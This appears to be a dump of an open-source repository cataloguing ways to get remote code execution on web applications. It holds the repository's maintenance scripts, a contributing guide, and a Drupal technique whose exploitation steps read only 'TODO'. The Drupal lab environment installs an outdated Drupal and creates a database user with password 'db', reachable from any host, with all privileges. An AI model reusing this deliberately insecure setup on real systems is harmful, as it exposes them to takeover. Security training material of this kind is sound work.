```text
.
├── .github
│   ├── FUNDING.yml
│   └── manage
│       ├── manage.py
│       ├── modify_all_json.py
│       └── templates
│           ├── category_README.md.jinja2
│           └── main_README.md.jinja2
├── CONTRIBUTING.md
├── Content-Management-Systems-(CMS)
│   ├── Drupal
│   │   ├── README.md
│   │   └── techniques
│   │       ├── Services-module-unserialize-to-rce
│   │       │   ├── README.md
│   │       │   ├── technique.json
│   │       │   └── test_env
│   │       │       ├── Dockerfile
│   │       │       ├── Makefile
│   │       │       └── files
│   │       │           ├── apache2.conf
│   │       │           └── services-7.x-3.18.tar.gz
│   │       ├── Upload-a-plugin
│   │       │   ├── README.md
│   │       │   ├── technique.json
│   │       │   └── test_env
│   │       │       ├── Dockerfile
│   │       │       ├── Makefile
│   │       │       └── files
│   │       │           └── apache2.conf
│   │       └── Upload-a-theme
│   │           ├── README.md
│   │           ├── images
│   │           │   └── README
│   │           │       ├── 2022-06-27-04-46-36.png
│   │           │       ├── 2022-06-27-05-04-26.png
│   │           │       ├── 2022-06-27-05-09-03.png
│   │           │       ├── 2022-06-27-05-11-55.png
│   │           │       └── 2022-06-27-05-14-58.png
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               ├── Makefile
│   │               └── files
│   │                   └── apache2.conf
│   ├── FuelCMS
│   │   ├── README.md
│   │   └── techniques
│   │       └── CVE-2018-16763_-_Pre-Auth_Remote_Code_Execution
│   │           ├── README.md
│   │           ├── imgs
│   │           │   └── exploit_trigger.png
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               ├── Makefile
│   │               └── files
│   │                   ├── .htaccess
│   │                   ├── apache2.conf
│   │                   └── database.php
│   ├── Joomla
│   │   ├── README.md
│   │   └── techniques
│   │       └── Upload-a-plugin
│   │           ├── README.md
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               └── Makefile
│   ├── README.md
│   ├── SweetRice
│   │   ├── README.md
│   │   └── techniques
│   │       ├── Add-ADS
│   │       │   ├── README.md
│   │       │   ├── imgs
│   │       │   │   ├── add_ad.png
│   │       │   │   ├── ads_page.png
│   │       │   │   ├── dashboard.png
│   │       │   │   └── shell.png
│   │       │   ├── technique.json
│   │       │   └── test_env
│   │       │       ├── Dockerfile
│   │       │       └── Makefile
│   │       └── Modify-theme-to-include-php-code
│   │           ├── README.md
│   │           ├── imgs
│   │           │   ├── dashboard.png
│   │           │   ├── list_themes.png
│   │           │   ├── reverse_shell.png
│   │           │   ├── reverse_shell_received.png
│   │           │   ├── theme_editor.png
│   │           │   └── visite_site.png
│   │           └── technique.json
│   ├── Typo3
│   │   ├── README.md
│   │   └── techniques
│   │       └── Arbitrary-deserialisation
│   │           ├── README.md
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               └── Makefile
│   └── Wordpress
│       ├── README.md
│       └── techniques
│           ├── Install-FileManagement-Plugin
│           │   ├── README.md
│           │   ├── imgs
│           │   │   ├── Installing_filemanager.png
│           │   │   ├── add_new.png
│           │   │   ├── code_edit.png
│           │   │   ├── creating_new_file.png
│           │   │   ├── execute_commands.png
│           │   │   ├── paste_phpshellcode.png
│           │   │   └── plugin_page.png
│           │   ├── technique.json
│           │   └── test_env
│           │       ├── Dockerfile
│           │       └── Makefile
│           ├── Modify-theme-to-include-php-code
│           │   ├── README.md
│           │   ├── imgs
│           │   │   ├── dashboard.png
│           │   │   ├── list_themes.png
│           │   │   ├── reverse_shell.png
│           │   │   ├── reverse_shell_received.png
│           │   │   ├── theme_editor.png
│           │   │   └── visite_site.png
│           │   ├── technique.json
│           │   └── test_env
│           │       ├── Dockerfile
│           │       └── Makefile
│           └── Upload-a-plugin
│               ├── README.md
│               ├── WPterm_plugin.md
│               ├── imgs
│               │   ├── activate_plugin.png
│               │   ├── dashboard.png
│               │   ├── download_file_web.png
│               │   ├── exec_code_web.png
│               │   ├── installing_plugin.png
│               │   ├── list_of_installed_plugins.png
│               │   ├── login.png
│               │   ├── plugin_add_new.png
│               │   ├── upload_plugin.png
│               │   ├── upload_wp_term.png
│               │   └── wpterm_webshell.png
│               ├── technique.json
│               ├── test_env
│               │   ├── Dockerfile
│               │   └── Makefile
│               └── wpterm.1.1.9.zip
├── Frameworks
│   ├── Apache-Tomcat
│   │   ├── README.md
│   │   └── techniques
│   │       ├── CVE-2017-12615_-_PUT_a_jsp_file
│   │       │   ├── README.md
│   │       │   └── technique.json
│   │       └── Deploy-an-application
│   │           ├── README.md
│   │           ├── imgs
│   │           │   ├── compile.png
│   │           │   ├── exec_code_web.png
│   │           │   ├── manager.png
│   │           │   ├── upload_a_plugin.png
│   │           │   └── webshell_uploaded.png
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               ├── Makefile
│   │               └── files
│   │                   ├── context.xml
│   │                   └── tomcat-users.xml
│   ├── JBoss
│   │   ├── README.md
│   │   └── techniques
│   │       └── Upload-a-plugin
│   │           ├── README.md
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               └── Makefile
│   ├── JoGet
│   │   ├── README.md
│   │   └── techniques
│   │       └── Upload-a-plugin
│   │           ├── README.md
│   │           ├── imgs
│   │           │   ├── demo.mp4
│   │           │   ├── exec_code_web.png
│   │           │   ├── ip_whitelist_api.png
│   │           │   ├── manage_plugins_interface.png
│   │           │   ├── plugin_installed_and_ready.png
│   │           │   └── upload_a_plugin.png
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               └── Makefile
│   ├── README.md
│   └── WildFly
│       ├── README.md
│       └── techniques
│           └── Deploy-an-application
│               ├── README.md
│               ├── imgs
│               │   ├── wildfly_console.png
│               │   └── wildfly_console_login.png
│               ├── technique.json
│               └── test_env
│                   ├── Dockerfile
│                   └── Makefile
├── Learning-Management-Systems-(LMS)
│   ├── Moodle
│   │   ├── README.md
│   │   └── techniques
│   │       └── Upload-a-plugin
│   │           ├── README.md
│   │           ├── imgs
│   │           │   ├── Install_plugins_page.png
│   │           │   ├── choose_plugin_zip_file.png
│   │           │   ├── download_file_web.png
│   │           │   ├── exec_code_web.png
│   │           │   ├── install_plugin_from_zip_file.png
│   │           │   ├── plugin_successfully_uploaded.png
│   │           │   ├── site_dashboard.png
│   │           │   ├── upload_and_install.png
│   │           │   └── upload_and_install_choose_file.png
│   │           └── technique.json
│   └── README.md
├── Other
│   ├── GLPI
│   │   ├── README.md
│   │   └── techniques
│   │       └── GLPI_shellcommand_plugin_authenticated_rce
│   │           └── README.md
│   ├── GiTea
│   │   ├── README.md
│   │   └── techniques
│   │       └── User-with-git-hooks-activated
│   │           ├── README.md
│   │           ├── imgs
│   │           │   ├── gitea_reverse_shell.png
│   │           │   ├── gitea_service_after_exploit.png
│   │           │   ├── gitea_service_before_exploit.png
│   │           │   ├── may_create_git_hooks.png
│   │           │   └── post_receive_hook.png
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               └── Makefile
│   ├── Gitlab
│   │   ├── README.md
│   │   └── techniques
│   │       └── CVE-2021-22205 - Unauthenticated RCE using ExifTool
│   │           ├── README.md
│   │           ├── imgs
│   │           │   ├── gitlab_approximative_version.png
│   │           │   ├── gitlab_version.png
│   │           │   ├── metasploit_gitlab_rce.png
│   │           │   ├── nuclei_id.png
│   │           │   ├── nuclei_tags.png
│   │           │   └── rev_shell_python.png
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               └── Makefile
│   ├── Jenkins
│   │   ├── README.md
│   │   └── techniques
│   │       └── Execute-a-script-in-the-console
│   │           ├── README.md
│   │           ├── imgs
│   │           │   ├── demo.mp4
│   │           │   ├── manage.png
│   │           │   ├── reverse_shell.png
│   │           │   ├── script_console.png
│   │           │   ├── shell.png
│   │           │   └── welcome.png
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               └── Makefile
│   ├── LimeSurvey
│   │   ├── README.md
│   │   └── techniques
│   │       └── Upload-a-plugin
│   │           ├── README.md
│   │           ├── imgs
│   │           │   ├── configuration_plugins.png
│   │           │   ├── exec_code_web.png
│   │           │   └── upload_and_install.png
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               └── Makefile
│   ├── PHP
│   │   ├── README.md
│   │   └── techniques
│   │       └── PHP-8.1.0-dev-User-Agentt-RCE
│   │           ├── README.md
│   │           ├── imgs
│   │           │   └── phpinfo.png
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               └── Makefile
│   ├── README.md
│   ├── Rocket.Chat
│   │   ├── README.md
│   │   └── techniques
│   │       └── Add-an-integration-script
│   │           ├── README.md
│   │           ├── imgs
│   │           │   ├── add_integration.png
│   │           │   ├── add_integration_page.png
│   │           │   ├── admin_page.png
│   │           │   ├── dashboard.png
│   │           │   ├── getting_webhook_url.png
│   │           │   ├── got_shell.png
│   │           │   ├── integration_enabled.png
│   │           │   ├── script_added.png
│   │           │   └── service_unavaible.png
│   │           ├── technique.json
│   │           └── test_env
│   │               ├── Dockerfile
│   │               └── Makefile
│   └── Webmin
│       ├── README.md
│       └── techniques
│           └── CVE-2022-36446_-_Webmin_1.996_authenticated_rce
│               ├── README.md
│               ├── imgs
│               │   ├── exploit_interactive_mode.png
│               │   ├── exploit_single_command_mode.png
│               │   ├── login.png
│               │   └── software_package_updates.png
│               ├── technique.json
│               └── test_env
│                   ├── Dockerfile
│                   └── Makefile
└── README.md
```

--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------

```yaml
# These are supported funding model platforms

github: p0dalirius
patreon: Podalirius
```

--------------------------------------------------------------------------------
/.github/manage/manage.py:
--------------------------------------------------------------------------------

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : manage.py
# Author             : Podalirius (@podalirius_)
# Date created       : 6 Aug 2022

import argparse
import glob
import json
import os

import jinja2


def find_and_parse():
    """Collect every technique.json into a nested dict:
    {category: {software: {technique: data}}}."""
    awesome_rce_techniques = {}
    for path_to_json_file in glob.glob("../../*/*/techniques/*/technique.json"):
        with open(path_to_json_file, 'r') as f:
            data = json.load(f)
        # Path layout relative to the repository root:
        # <category>/<software>/techniques/<technique>/technique.json
        path = os.path.relpath(path_to_json_file, "../..").split(os.sep)
        category, software, technique = path[0], path[1], path[3]
        awesome_rce_techniques.setdefault(category, {}).setdefault(software, {})
        if technique not in awesome_rce_techniques[category][software]:
            awesome_rce_techniques[category][software][technique] = data
    return awesome_rce_techniques


def generate_readme(awesome_rce_techniques: dict):
    """Render the main README.md and one README.md per category from the Jinja2 templates."""
    with open("./templates/main_README.md.jinja2", 'r') as f:
        main_template = jinja2.Template(f.read())

    with open("./templates/category_README.md.jinja2", 'r') as f:
        category_template = jinja2.Template(f.read())

    # Counting total number of techniques and splitting them into
    # finished techniques (not_wip) and work-in-progress ones (wip)
    nb_rce_techniques = 0
    wip = {}
    not_wip = {}
    for category in awesome_rce_techniques.keys():
        for software in awesome_rce_techniques[category].keys():
            for technique in awesome_rce_techniques[category][software].keys():
                nb_rce_techniques += 1
                technique_data = awesome_rce_techniques[category][software][technique]
                # A technique.json without the key is treated as finished
                target = wip if technique_data.get("work_in_progress", False) else not_wip
                target.setdefault(category, {}).setdefault(software, {})
                if technique not in target[category][software]:
                    target[category][software][technique] = technique_data

    # Generating readme
    print("[>] Generating 'README.md'")
    with open('../../README.md', 'w') as f:
        f.write(main_template.render(
            nb_rce_techniques=nb_rce_techniques,
            not_wip=not_wip,
            wip=wip,
            fct_sorted=sorted,
            fct_len=len
        ))

    # Generating category readmes
    for category in awesome_rce_techniques.keys():
        print("[>] Generating '%s/README.md'" % category)
        with open('../../%s/README.md' % category, 'w') as f:
            f.write(category_template.render(
                category=category,
                awesome_rce_techniques=awesome_rce_techniques,
                fct_sorted=sorted,
                fct_len=len
            ))
    print("[+] All done!")


def parseArgs():
    parser = argparse.ArgumentParser(description="Regenerate the README.md files of Awesome-RCE-techniques from the technique.json files.")
    parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')
    return parser.parse_args()


if __name__ == '__main__':
    options = parseArgs()

    awesome_rce_techniques_data = find_and_parse()
    generate_readme(awesome_rce_techniques_data)
```

--------------------------------------------------------------------------------
/.github/manage/modify_all_json.py:
--------------------------------------------------------------------------------

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : modify_all_json.py
# Author             : Podalirius (@podalirius_)
# Date created       : 6 Aug 2022

import glob
import json
import os


def find_techniques_and_apply_modifiers(modifiers):
    """Load each technique.json together with its README.md, run every modifier
    on the parsed data and write the result back to technique.json."""
    for path_to_json_file in glob.glob("../../*/*/techniques/*/technique.json"):
        with open(path_to_json_file, 'r') as f:
            data = json.load(f)

        with open(os.path.join(os.path.dirname(path_to_json_file), 'README.md'), 'r') as f:
            readme = f.read()

        # Apply the modifiers in order; each one returns the updated data
        for fct_modifier in modifiers:
            data = fct_modifier(data, readme)

        # Write
        with open(path_to_json_file, 'w') as f:
            json.dump(data, f, indent=4)


def add_references(data, readme):
    """Fill data["references"] with the URLs listed under the README's '## References' heading."""
    readme = readme.strip()
    if "## References" in readme:
        data["references"] = []
        references = readme.split("## References")[-1].split('\n')
        for ref_line in references:
            if "http" in ref_line:
                # Keep only the URL, dropping the list marker and any text before it
                ref_line = 'http' + ref_line.split('http', 1)[1].strip()
                data["references"].append(ref_line)
    return data


def add_work_in_progress(data, readme):
    """Mark every technique as finished (the flag is edited by hand afterwards)."""
    data["work_in_progress"] = False
    return data


if __name__ == '__main__':

    modifiers = [add_work_in_progress, add_references]

    find_techniques_and_apply_modifiers(modifiers)
```

--------------------------------------------------------------------------------
/.github/manage/templates/category_README.md.jinja2:
--------------------------------------------------------------------------------

```jinja
# {{ category }}

## Softwares
{% for software in fct_sorted(awesome_rce_techniques[category].keys()) %}
- [**{{ software }}**: ({{ fct_len(awesome_rce_techniques[category][software].keys()) }} {{ "technique" if fct_len(awesome_rce_techniques[category][software].keys()) == 1 else "techniques" }})](./{{ software }}/){% endfor %}
```

--------------------------------------------------------------------------------
/.github/manage/templates/main_README.md.jinja2:
--------------------------------------------------------------------------------

```jinja
# Awesome RCE techniques

Awesome list of techniques to achieve Remote Code Execution (RCE) on various apps!

Number of RCE techniques

YouTube Channel Subscribers

## Goal of this project

The goal of this project is to provide an open-source knowledge database of all the techniques to achieve Remote Code Execution (RCE) on various applications. All of these techniques also come with a test environment (usually a Docker image) for you to practice them.

## Techniques

{% for category in fct_sorted(not_wip.keys()) %}
- [{{ category }}](./{{ category }}/){% for software in fct_sorted(not_wip[category].keys()) %}
  + [**{{ software }}**: ({{ fct_len(not_wip[category][software].keys()) }} {{ "technique" if fct_len(not_wip[category][software].keys()) == 1 else "techniques" }})](./{{ category }}/{{ software }}/){% endfor %}

{% endfor %}

## Work in progress

These techniques are a work in progress. You can help us finish them by opening a pull request!

{% for category in fct_sorted(wip.keys()) %}
- [{{ category }}](./{{ category }}/){% for software in fct_sorted(wip[category].keys()) %}{% for technique in fct_sorted(wip[category][software].keys()) %}
  + 🔧 [**{{ software }}**: {{ wip[category][software][technique]["name"] }}](./{{ category }}/{{ software }}/techniques/{{ technique }}/)
{% endfor %}{% endfor %}
{% endfor %}

## Troubleshooting

Report all the issues on https://github.com/p0dalirius/Awesome-RCE-techniques/issues.

## Contributors

Pull requests are welcome. Feel free to open an issue if you want to add other Remote Code Execution (RCE) techniques.
```

--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------

# Introduction

### Welcome contributors!

First off, thank you for considering contributing to Awesome-RCE-techniques. It's people like you that make Awesome-RCE-techniques such a great resource.

### Our guidelines.

Please take a moment to review this document in order to make the contribution process easy and effective for everyone involved. Awesome-RCE-techniques is a compilation of code execution techniques that aims to be the most comprehensive and beginner-friendly.

### Contributions we are looking for.

Documenting all the RCE techniques is a time-consuming process; you can help by:

* Reporting a technique or an application that isn't covered yet. Consider adding all the information you have to help the team (GitHub page, version, screenshot, documentation, walkthrough ...).
* Writing a step-by-step process of how to achieve Remote Code Execution on this application.
* Providing a test environment (Docker) to allow everyone to try these Remote Code Execution (RCE) techniques locally.

### Contributions we are NOT looking for.

Please don't use the issue tracker for support questions. If you can't figure out how to achieve RCE on an application, feel free to check these resources:

* The Hacker Recipes (https://www.thehacker.recipes/)
* HackTricks (https://book.hacktricks.xyz/welcome/readme)
* Payloads All The Things (https://github.com/swisskyrepo/PayloadsAllTheThings)

# Community Code of Conduct

### Be respectful

> This community and its members treat one another with respect. Everyone can make a valuable contribution to Awesome-RCE-techniques. We may not always agree, but disagreement is no excuse for poor behavior and poor manners. We might all experience some frustration now and then, but we cannot allow that frustration to turn into a personal attack. It's important to remember that a community where people feel uncomfortable or threatened isn't a productive one. We expect members of the community to be respectful when dealing with other contributors as well as with people outside the Awesome-RCE-techniques project and with users of this documentation.

### Be collaborative

> Collaboration is central to the free software community. We should always be open to collaboration. Your work should be done transparently and patches should be given back to the community when they're made, not just when the distribution releases. If you wish to work on new code for existing upstream projects, at least keep those projects informed of your ideas and progress. It may not be possible to get consensus from upstream, or even from your colleagues about the correct implementation for an idea, so don't feel obliged to have that agreement before you begin, but at least keep the outside world informed of your work, and publish your work in a way that allows outsiders to test, discuss, and contribute to your efforts.

### When you disagree, consult others

> Disagreements, both political and technical, happen all the time and the Celery community is no exception. It's important that we resolve disagreements and differing views constructively and with the help of the community and community process. If you really want to go a different way, then we encourage you to make a derivative distribution or alternate set of packages that still build on the work we've done to utilize as common of a core as possible.

### When you're unsure, ask for help

> Nobody knows everything, and nobody is expected to be perfect. Asking questions avoids many problems down the road, and so questions are encouraged. Those who are asked questions should be responsive and helpful. However, when asking a question, care must be taken to do so in an appropriate forum.

### Step down considerately

> Developers on every project come and go and here is no different. When you leave or disengage from the project, in whole or in part, we ask that you do so in a way that minimizes disruption to the project. This means you should tell people you're leaving and take the proper steps to ensure that others can pick up where you left off.

[source: [Celery](https://github.com/celery/celery/blob/master/CONTRIBUTING.rst#community-code-of-conduct)]

# Your First Contribution

> Unsure where to begin contributing to Awesome-RCE-techniques? You can start by looking through these beginner and help-wanted issues:
> Beginner issues - issues which should only require a few lines of code, and a test or two.
> Help wanted issues - issues which should be a bit more involved than beginner issues.
> Both issue lists are sorted by total number of comments. While not perfect, number of comments is a reasonable proxy for impact a given change will have.

[source: [Atom](https://github.com/atom/atom/blob/master/CONTRIBUTING.md#your-first-code-contribution)] **Need more inspiration?** [1] [Read the Docs](http://docs.readthedocs.org/en/latest/contribute.html#contributing-to-development) [2] [Django](https://docs.djangoproject.com/en/dev/internals/contributing/new-contributors/#first-steps) (scroll down to "Guidelines" as well)

### You have never contributed to an open source project?
Here are a couple of friendly tutorials: http://makeapullrequest.com/ and http://www.firsttimersonly.com/

> Working on your first Pull Request? You can learn how from this *free* series, [How to Contribute to an Open Source Project on GitHub](https://egghead.io/series/how-to-contribute-to-an-open-source-project-on-github).

[source: [React](https://github.com/facebook/react/blob/master/CONTRIBUTING.md#pull-requests)]

As a side note, it helps to use newcomer-friendly language throughout the rest of your document. Here are a couple of examples from [Active Admin](https://github.com/activeadmin/activeadmin/blob/master/CONTRIBUTING.md):

> At this point, you're ready to make your changes! Feel free to ask for help; everyone is a beginner at first :smile_cat:
>
> If a maintainer asks you to "rebase" your PR, they're saying that a lot of code has changed, and that you need to update your branch so it's easier to merge.

# Getting started
### Give them a quick walkthrough of how to submit a contribution.
How you write this is up to you, but some things you may want to include:

> For something that is bigger than a one or two line fix:
>
> 1. Create your own fork of the code
> 2. Do the changes in your fork
> 3. If you like the change and think the project could use it:
>     * Be sure you have followed the code style for the project.
>     * Sign the Contributor License Agreement, CLA, with the jQuery Foundation.
>     * Note the jQuery Foundation Code of Conduct.
>     * Send a pull request indicating that you have a CLA on file.

[source: [Requirejs](http://requirejs.org/docs/contributing.html)] **Need more inspiration?** [1] [Active Admin](https://github.com/activeadmin/activeadmin/blob/master/CONTRIBUTING.md#1-where-do-i-go-from-here) [2] [Node.js](https://github.com/nodejs/node/blob/master/CONTRIBUTING.md#code-contributions) [3] [Ember.js](https://github.com/emberjs/ember.js/blob/master/CONTRIBUTING.md#pull-requests)

### If you have a different process for small or "obvious" fixes, let them know.

> Small contributions such as fixing spelling errors, where the content is small enough to not be considered intellectual property, can be submitted by a contributor as a patch, without a CLA.
>
> As a rule of thumb, changes are obvious fixes if they do not introduce any new functionality or creative thinking. As long as the change does not affect functionality, some likely examples include the following:
> * Spelling / grammar fixes
> * Typo correction, white space and formatting changes
> * Comment clean up
> * Bug fixes that change default return values or error codes stored in constants
> * Adding logging messages or debugging output
> * Changes to 'metadata' files like Gemfile, .gitignore, build scripts, etc.
> * Moving source files from one directory or package to another

[source: [Chef](https://github.com/chef/chef/blob/master/CONTRIBUTING.md#chef-obvious-fix-policy)] **Need more inspiration?** [1] [Puppet](https://github.com/puppetlabs/puppet/blob/master/CONTRIBUTING.md#making-trivial-changes)

# How to report a bug
### Explain security disclosures first!
At bare minimum, include this sentence:
> If you find a security vulnerability, do NOT open an issue. Email XXXX instead.

If you don't want to use your personal contact information, set up a "security@" email address. Larger projects might have more formal processes for disclosing security issues, including encrypted communication. (Disclosure: I am not a security expert.)

> Any security issues should be submitted directly to security@travis-ci.org
> In order to determine whether you are dealing with a security issue, ask yourself these two questions:
> * Can I access something that's not mine, or something I shouldn't have access to?
> * Can I disable something for other people?
>
> If the answer to either of those two questions is "yes", then you're probably dealing with a security issue. Note that even if you answer "no" to both questions, you may still be dealing with a security issue, so if you're unsure, just email us at security@travis-ci.org.

[source: [Travis CI](https://github.com/travis-ci/travis-ci/blob/master/CONTRIBUTING.md)] **Need more inspiration?** [1] [Celery](https://github.com/celery/celery/blob/master/CONTRIBUTING.rst#security) [2] [Express.js](https://github.com/expressjs/express/blob/master/Security.md)

### Tell your contributors how to file a bug report.
You can even include a template so people can just copy-paste (again, less work for you).

> When filing an issue, make sure to answer these questions:
>
> 1. What operating system and processor architecture are you using?
> 2. What did you do?
> 3. What did you expect to see?
> 4. What did you see instead?

[source: [Go](https://github.com/golang/go/blob/master/CONTRIBUTING.md#filing-issues)] **Need more inspiration?** [1] [Celery](https://github.com/celery/celery/blob/master/CONTRIBUTING.rst#other-bugs) [2] [Atom](https://github.com/atom/atom/blob/master/CONTRIBUTING.md#reporting-bugs) (includes template)

# How to suggest a feature or enhancement
### If you have a particular roadmap, goals, or philosophy for development, share it here.
This information will give contributors context before they make suggestions that may not align with the project's needs.

> The Express philosophy is to provide small, robust tooling for HTTP servers, making it a great solution for single page applications, web sites, hybrids, or public HTTP APIs.
>
> Express does not force you to use any specific ORM or template engine. With support for over 14 template engines via Consolidate.js, you can quickly craft your perfect framework.

[source: [Express](https://github.com/expressjs/express#philosophy)] **Need more inspiration?** [Active Admin](https://github.com/activeadmin/activeadmin#goals)

### Explain your desired process for suggesting a feature.
If there is back-and-forth or signoff required, say so. Ask them to scope the feature, thinking through why it's needed and how it might work.

> If you find yourself wishing for a feature that doesn't exist in Elasticsearch, you are probably not alone. There are bound to be others out there with similar needs. Many of the features that Elasticsearch has today have been added because our users saw the need. Open an issue on our issues list on GitHub which describes the feature you would like to see, why you need it, and how it should work.

[source: [Elasticsearch](https://github.com/elastic/elasticsearch/blob/master/CONTRIBUTING.md#feature-requests)] **Need more inspiration?** [1] [Hoodie](https://github.com/hoodiehq/hoodie/blob/master/CONTRIBUTING.md#feature-requests) [2] [Ember.js](https://github.com/emberjs/ember.js/blob/master/CONTRIBUTING.md#requesting-a-feature)

# Code review process

### Explain how a contribution gets accepted after it's been submitted.

Who reviews it? Who needs to sign off before it's accepted? When should a contributor expect to hear from you? How can contributors get commit access, if at all?

> The core team looks at Pull Requests on a regular basis in a weekly triage meeting that we hold in a public Google Hangout. The hangout is announced in the weekly status updates that are sent to the puppet-dev list. Notes are posted to the Puppet Community community-triage repo and include a link to a YouTube recording of the hangout.
> After feedback has been given we expect responses within two weeks. After two weeks we may close the pull request if it isn't showing any activity.

[source: [Puppet](https://github.com/puppetlabs/puppet/blob/master/CONTRIBUTING.md#submitting-changes)] **Need more inspiration?** [1] [Meteor](https://meteor.hackpad.com/Responding-to-GitHub-Issues-SKE2u3tkSiH) [2] [Express.js](https://github.com/expressjs/express/blob/master/Contributing.md#becoming-a-committer)

--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/README.md:
--------------------------------------------------------------------------------

# Drupal

Drupal is a free and open-source web content management system written in PHP and distributed under the GNU General Public License. Drupal provides an open-source back-end framework for at least 14% of the top 10,000 websites worldwide—ranging from personal blogs to corporate, political, and government sites.

- https://www.drupal.org/

## Techniques to achieve RCE on Drupal

### With admin credentials

- [Services module unserialize to RCE](./techniques/Services-module-unserialize-to-rce/README.md)
- [Upload a plugin](./techniques/Upload-a-plugin/README.md)
- [Upload a theme](./techniques/Upload-a-theme/README.md)

--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/README.md:
--------------------------------------------------------------------------------

# Drupal 7.x - Services module unserialize() to RCE

## Requirements

- A valid **username and password** of a user with **admin rights** on Drupal.

## Exploitation

TODO

## References
- https://www.ambionics.io/blog/drupal-services-module-rce
- https://www.drupal.org/node/2858847

--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/technique.json:
--------------------------------------------------------------------------------

```json
{
    "name": "Drupal 7.x - Services module unserialize() to RCE",
    "work_in_progress": false,
    "references": [
        "https://www.ambionics.io/blog/drupal-services-module-rce",
        "https://www.drupal.org/node/2858847"
    ]
}
```

--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/test_env/Dockerfile:
--------------------------------------------------------------------------------

```dockerfile
FROM debian:buster

ENV DRUPALVERSION "7.54"

RUN apt-get -y -q update; \
    apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server composer

COPY ./files/apache2.conf /etc/apache2/apache2.conf
COPY ./files/services-7.x-3.18.tar.gz /var/www/html/

RUN a2enmod rewrite; service mysql start;\
    mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;"

RUN wget "https://ftp.drupal.org/files/projects/drupal-${DRUPALVERSION}.zip" -O /tmp/drupal.zip \
    && cd /var/www/html/ \
    && rm index.html \
    && unzip /tmp/drupal.zip \
    && mv drupal-${DRUPALVERSION}/* ./ \
    && composer install

RUN chown www-data: -R /var/www/

RUN echo "#!/bin/bash" > /entrypoint.sh ;\
    echo "service mysql start" >> /entrypoint.sh ;\
    echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\
    chmod +x /entrypoint.sh

EXPOSE 80

CMD /entrypoint.sh
```

--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/test_env/Makefile:
--------------------------------------------------------------------------------

```makefile
.PHONY: build img

IMGNAME := awesome_rce_drupal_upload_a_plugin

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start: build
	docker run --rm -it -p 10080:80 $(IMGNAME)

background:
	docker run --rm -d -p 10080:80 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
```

--------------------------------------------------------------------------------
/Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/test_env/files/apache2.conf:
--------------------------------------------------------------------------------

```apache
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.4/ for detailed information about
# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
# hints.
#
#
# Summary of how the Apache 2 configuration works in Debian:
# The Apache 2 web server configuration in Debian is quite different to
# upstream's suggested way to configure the web server. This is because Debian's
# default Apache2 installation attempts to make adding and removing modules,
# virtual hosts, and extra configuration directives as flexible as possible, in
# order to make automating the changes and administering the server as easy as
# possible.

# It is split into several files forming the configuration hierarchy outlined
# below, all located in the /etc/apache2/ directory:
#
#	/etc/apache2/
#	|-- apache2.conf
#	|	`--  ports.conf
#	|-- mods-enabled
#	|	|-- *.load
#	|	`-- *.conf
#	|-- conf-enabled
#	|	`-- *.conf
#	`-- sites-enabled
#		`-- *.conf
#
#
# * apache2.conf is the main configuration file (this file). It puts the pieces
#   together by including all remaining configuration files when starting up the
#   web server.
#
# * ports.conf is always included from the main configuration file. It is
#   supposed to determine listening ports for incoming connections which can be
#   customized anytime.
#
# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
#   directories contain particular configuration snippets which manage modules,
#   global configuration fragments, or virtual host configurations,
#   respectively.
#
#   They are activated by symlinking available configuration files from their
#   respective *-available/ counterparts. These should be managed by using our
#   helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
#   their respective man pages for detailed information.
#
# * The binary is called apache2. Due to the use of environment variables, in
#   the default configuration, apache2 needs to be started/stopped with
#   /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
#   work with the default configuration.
```
